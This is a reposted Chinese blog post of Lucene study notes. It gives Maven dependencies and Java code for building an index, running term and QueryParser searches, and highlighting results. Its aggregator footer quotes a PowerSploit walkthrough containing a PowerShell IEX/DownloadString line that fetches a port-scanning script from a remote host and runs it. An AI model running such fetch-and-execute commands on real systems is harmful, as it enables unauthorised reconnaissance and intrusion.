lucene学习的小结

pom.xml设置

    <dependency><groupId>junit</groupId><artifactId>junit</artifactId><version>4.12</version><scope>test</scope></dependency><dependency><groupId>org.apache.lucene</groupId><artifactId>lucene-core</artifactId><version>5.3.1</version></dependency><dependency><groupId>org.apache.lucene</groupId><artifactId>lucene-queryparser</artifactId><version>5.3.1</version></dependency><dependency><groupId>org.apache.lucene</groupId><artifactId>lucene-analyzers-common</artifactId><version>5.3.1</version></dependency><dependency><groupId>org.apache.lucene</groupId><artifactId>lucene-analyzers-smartcn</artifactId><version>5.3.1</version></dependency><dependency><groupId>org.apache.lucene</groupId><artifactId>lucene-highlighter</artifactId><version>5.3.1</version></dependency>

 

生成索引IndexingTest.java

package com.chabansheng.lucene;import java.nio.file.Paths;import ...;public class IndexingTest {private String ids[]={"1","2","3","4"};private String authors[]={"Jack","Marry","John","Json"};private String positions[]={"accounting","technician","salesperson","boss"};private String titles[]={"Java is a good language.","Java is a cross platform language","Java powerful","You should learn java"};private String contents[]={"If possible, use the same JRE major version at both index and search time.","When upgrading to a different JRE major version, consider re-indexing. ","Different JRE major versions may implement different versions of Unicode,","For example: with Java 1.4, `LetterTokenizer` will split around the character U+02C6,"};private Directory dir;/*** 生成索引* @throws Exception*/@Testpublic void index()throws Exception{dir=FSDirectory.open(Paths.get("D:\\lucene3"));//获取IndexWriter实例Analyzer analyzer=new StandardAnalyzer(); // 标准分词器IndexWriterConfig iwc=new IndexWriterConfig(analyzer);IndexWriter writer=new IndexWriter(dir, iwc);for(int i=0;i<ids.length;i++){Document doc=new Document();doc.add(new StringField("id", ids[i], Field.Store.YES));doc.add(new StringField("author",authors[i],Field.Store.YES));doc.add(new StringField("position",positions[i],Field.Store.YES));// 加权操作TextField field=new TextField("title", titles[i], Field.Store.YES);if("boss".equals(positions[i])){field.setBoost(1.5f);}doc.add(field);doc.add(new TextField("content", contents[i], Field.Store.NO));writer.addDocument(doc); // 添加文档
        }writer.close();}/*** 查询索引方式一* @throws Exception*/@Testpublic void search()throws Exception{dir=FSDirectory.open(Paths.get("D:\\lucene"));IndexReader reader=DirectoryReader.open(dir);IndexSearcher is=new IndexSearcher(reader);String searchField="title";String q="java";//Term方式查询Term t=new Term(searchField,q);Query query=new TermQuery(t);TopDocs hits=is.search(query, 10);System.out.println("匹配 '"+q+"',总共查询到"+hits.totalHits+"个文档");for(ScoreDoc scoreDoc:hits.scoreDocs){Document doc=is.doc(scoreDoc.doc);System.out.println(doc.get("author"));}reader.close();}}

查询索引方式二Searcher.java

package com.chabansheng.lucene;import java.io.StringReader;
import java.nio.file.Paths;import ...;public class Searcher {public static void search(String indexDir,String q)throws Exception{Directory dir=FSDirectory.open(Paths.get(indexDir));IndexReader reader=DirectoryReader.open(dir);IndexSearcher is=new IndexSearcher(reader);//QueryParser查询方式// Analyzer analyzer=new StandardAnalyzer(); // 标准分词器SmartChineseAnalyzer analyzer=new SmartChineseAnalyzer();QueryParser parser=new QueryParser("desc", analyzer);Query query=parser.parse(q);TopDocs hits=is.search(query, 10); //高亮行号QueryScorer scorer=new QueryScorer(query);Fragmenter fragmenter=new SimpleSpanFragmenter(scorer);SimpleHTMLFormatter simpleHTMLFormatter=new SimpleHTMLFormatter("<b><font color='red'>","</font></b>");Highlighter highlighter=new Highlighter(simpleHTMLFormatter, scorer);highlighter.setTextFragmenter(fragmenter);for(ScoreDoc scoreDoc:hits.scoreDocs){Document doc=is.doc(scoreDoc.doc);System.out.println(doc.get("city"));System.out.println(doc.get("desc"));String desc=doc.get("desc");if(desc!=null){TokenStream tokenStream=analyzer.tokenStream("desc", new StringReader(desc));System.out.println(highlighter.getBestFragment(tokenStream, desc));}}reader.close();}public static void main(String[] args) {String indexDir="D:\\lucene2";String q="南京文明";try {search(indexDir,q);} catch (Exception e) {// TODO Auto-generated catch block
            e.printStackTrace();}}
}

 

package com.chabansheng.lucene;
import java.nio.file.Paths;
import org.apache.lucene.analysis.Analyzer;import org.apache.lucene.analysis.standard.StandardAnalyzer;import org.apache.lucene.document.Document;import org.apache.lucene.document.Field;import org.apache.lucene.document.StringField;import org.apache.lucene.document.TextField;import org.apache.lucene.index.DirectoryReader;import org.apache.lucene.index.IndexReader;import org.apache.lucene.index.IndexWriter;import org.apache.lucene.index.IndexWriterConfig;import org.apache.lucene.index.Term;import org.apache.lucene.search.IndexSearcher;import org.apache.lucene.search.Query;import org.apache.lucene.search.ScoreDoc;import org.apache.lucene.search.TermQuery;import org.apache.lucene.search.TopDocs;import org.apache.lucene.store.Directory;import org.apache.lucene.store.FSDirectory;import org.junit.Test;
public class IndexingTest {
private String ids[]={"1","2","3","4"};private String authors[]={"Jack","Marry","John","Json"};private String positions[]={"accounting","technician","salesperson","boss"};private String titles[]={"Java is a good language.","Java is a cross platform language","Java powerful","You should learn java"};private String contents[]={"If possible, use the same JRE major version at both index and search time.","When upgrading to a different JRE major version, consider re-indexing. ","Different JRE major versions may implement different versions of Unicode,","For example: with Java 1.4, `LetterTokenizer` will split around the character U+02C6,"};private Directory dir;/** * 生成索引 * @throws Exception */@Testpublic void index()throws Exception{dir=FSDirectory.open(Paths.get("D:\\lucene3"));//获取IndexWriter实例Analyzer analyzer=new StandardAnalyzer(); // 标准分词器IndexWriterConfig iwc=new IndexWriterConfig(analyzer);IndexWriter writer=new IndexWriter(dir, iwc);for(int i=0;i<ids.length;i++){Document doc=new Document();doc.add(new StringField("id", ids[i], Field.Store.YES));doc.add(new StringField("author",authors[i],Field.Store.YES));doc.add(new StringField("position",positions[i],Field.Store.YES));// 加权操作TextField field=new TextField("title", titles[i], Field.Store.YES);if("boss".equals(positions[i])){field.setBoost(1.5f);}doc.add(field);doc.add(new TextField("content", contents[i], Field.Store.NO));writer.addDocument(doc); // 添加文档}writer.close();}
/** * 查询 * @throws Exception */@Testpublic void search()throws Exception{dir=FSDirectory.open(Paths.get("D:\\lucene3"));IndexReader reader=DirectoryReader.open(dir);IndexSearcher is=new IndexSearcher(reader);String searchField="title";String q="java";//Term方式查询Term t=new Term(searchField,q);Query query=new TermQuery(t);TopDocs hits=is.search(query, 10);System.out.println("匹配 '"+q+"',总共查询到"+hits.totalHits+"个文档");for(ScoreDoc scoreDoc:hits.scoreDocs){Document doc=is.doc(scoreDoc.doc);System.out.println(doc.get("author"));}reader.close();}}

 

转载于:https://www.cnblogs.com/375163374lsb/p/10542985.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/449587.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

并行计算的专访

摘要&#xff1a;社区之星第9期采访的嘉宾是香港浸会大学计算机在读博士、浪潮高性能计算顾问赵开勇。此次他为我们揭开了高性能计算的神秘面纱&#xff0c;为读者讲解自己的经验心得。并且他认为基于移动设备的高性能计算将会成为未来潮流&#xff0c;低功耗、高性能也将成为一…

CentOS6.5 搭建 LNMP (linux + nginx + mysql + php)

前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。点击跳转到教程。 1&#xff1a;查看环境&#xff1a; 12[root10-4-14-168 html]# cat /etc/redhat-releaseCentOS release 6.5 (Final)2&#xff1a;关掉…

正睿2019省选附加赛 Day10 (这篇其实已经都咕咕了...)

目录 2019.3.13A.算算算(二项式定理 斯特林数)B.买买买C.树树树2019.3.13比赛链接 A.算算算(二项式定理 斯特林数) 题目链接 \(x^k\)可以用二项式定理展开&#xff0c;需要维护的就是\(0\sim k\)次方的\(\sum_{j}F(j,i)\)。加入一个数时&#xff0c;每一项都要再用一遍二项式定…

freemarker 从 spring boot execute jar可执行jar中访问模板文件

2019独角兽企业重金招聘Python工程师标准>>> private static Configuration freemarkerCfg null;static {freemarkerCfg new Configuration();//freemarker的模板目录try {String pathPrefix "/";// 为了支持能从execute jar 中获取模板文件URI uri C…

获取所有股票数据

#%%#先引入后面可能用到的包&#xff08;package&#xff09; import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns sns.set() %matplotlib inline #正常显示画图时出现的中文和负号 from pylab import mpl mpl.rcParams[font.…

POWERSPLOIT-Recon(信息侦察)脚本渗透实战

Recon(信息侦察)模块 a) 调用invoke-Portscan扫描内网主机的端口。 1&#xff09;通过IEX下载并调用invoke-portscan。 PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke -Portscan.ps1&qu…

股票代码前面为0,补齐6位数

df[code] df[code].apply(lambda x:str(x).zfill(6))

在CentOS 6上搭建LNMP环境

简介LNMP是Linux、Nginx、MySQL和PHP的缩写&#xff0c;这个组合是最常见的WEB服务器的运行环境之一。本文将带领大家在CentOS 6操作系统上搭建一套LNMP环境。 本教程适用于CentOS 6.x版本。 在安装LNMP环境之前&#xff0c;您需要先对CentOS操作系统做一些初始化的工作&#x…

前端技术周刊 2019-01-21:跨端开发的三条路线

2019-01-21 前端快爆 微软 Edge 开发者意图为 Chrome 实现 HTML Modules&#xff0c;该规范用来替代之前的 HTML Imports。其优点是基于 ES Modules&#xff0c;可以避免全局对象污染、脚本解析阻塞等问题。?点评&#xff1a;举报&#xff0c;有人在「秀恩爱」&#xff01; &l…

分配内存的方法,需要32位对齐

type 是char&#xff0c;short&#xff0c;int 。 #define DATA_ALIGN 1 #if DATA_ALIGN && WIN32 && (_MSC_VER > 1300) #define my_malloc(type,len) _aligned_malloc(sizeof(type) *(len), 32) #define my_free(ptr) _aligned_free(ptr) #e…

zabbix-02-CentOS7.4安装zabbix4.0

一、环境准备 1.1 主机规划 这里先对本次实验的机器做一个规划&#xff0c;之后的实验均通过这两台机器完成。 序号IP地址主机名CPU内存硬盘安装服务110.0.0.11zabbix-server1C2G20GBzabbix服务端210.0.0.12zabbix-agent1C1G20GBzabbix客户端1.2 操作系统选择 操作系统选择&…

再谈并发

再谈并发 上一篇python并发中讲到了&#xff0c;使用多进程&#xff0c;多线程&#xff0c;多任务来加快程序的运行。其中讲到的一点似乎有点问题&#xff0c;操作系统中线程是调度器的最小执行单位&#xff0c;那为何python中的多线程无法利用多核&#xff0c;只能在一个处理器…

centos6.8安装docker,kong-dashboard并实现页面访问

前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。点击跳转到教程。 我们通过kong-dashboard的admin-UI管理界面进行直观的查看。最终显示界面如图&#xff1a; 因为这个kong-dashboard要用到docker&#x…

leetcood学习笔记-204-计算质数

题目描述&#xff1a; 第一次提交;(超时)&#xff1a; class Solution:def countPrimes(self, n: int) -> int:count 0for i in range(2,n):for j in range(2,i1):if i%j 0 and j!i:breakif ji:count1return count 别人家的&#xff1a; 这题搜到一个非常牛逼的算法,叫做厄…

linux man

nameman - 即 manual &#xff0c;在线查看命令手册。 描述man 是一个系统手册&#xff0c;man 的每一个选项通常是命令名&#xff0c;查找显示选项中的每个相关联的手册页&#xff0c;默认操作按照指顺序&#xff0c;按屏打印显示。 下表显示手册章节号&#xff0c;以及它们包…

centos-install-kong-cassandra

转自&#xff1a;http://blog.54im.com/2016/12/15/centos-install-kong-cassandra/#前置阅读 对于一些传统的大型项目&#xff0c;传统的方式会有一些缺陷&#xff0c;比如说新人熟悉系统成本高&#xff08;因为整个系统作为一个整体&#xff0c;彼此会有一定的牵连&#xff0…

akshare做mfi策略

#!/usr/bin/env python # coding: utf-8#先引入后面可能用到的包&#xff08;package&#xff09; import pandas as pd import numpy as np import matplotlib.pyplot as plt#正常显示画图时出现的中文和负号 from pylab import mpl mpl.rcParams[font.sans-serif][SimHei] …

第二章学习小结

第二章学习小结 对比于上学期所学的知识&#xff0c;能切实感觉到这个学期的课程更加深入和抽象&#xff0c;在学习上难度也有所增加&#xff0c;虽然上个学期就听老师推荐过博客园&#xff0c;但是真正开始写博客还是第一次&#xff0c;最直观的感受就是在完成博客的过程中&am…

翁同龢后人向上海博物馆捐赠两件重要家藏

1月24日&#xff0c;翁万戈先生捐赠书画仪式在上海博物馆内举行。 上海博物馆 供图 1月24日&#xff0c;翁万戈先生捐赠书画仪式在上海博物馆内举行。 上海博物馆 供图 中新网上海1月24日电 (王笈)翁同龢后人翁以钧24日携夫人柳至善&#xff0c;代表翁万戈将两件翁氏家族的重要…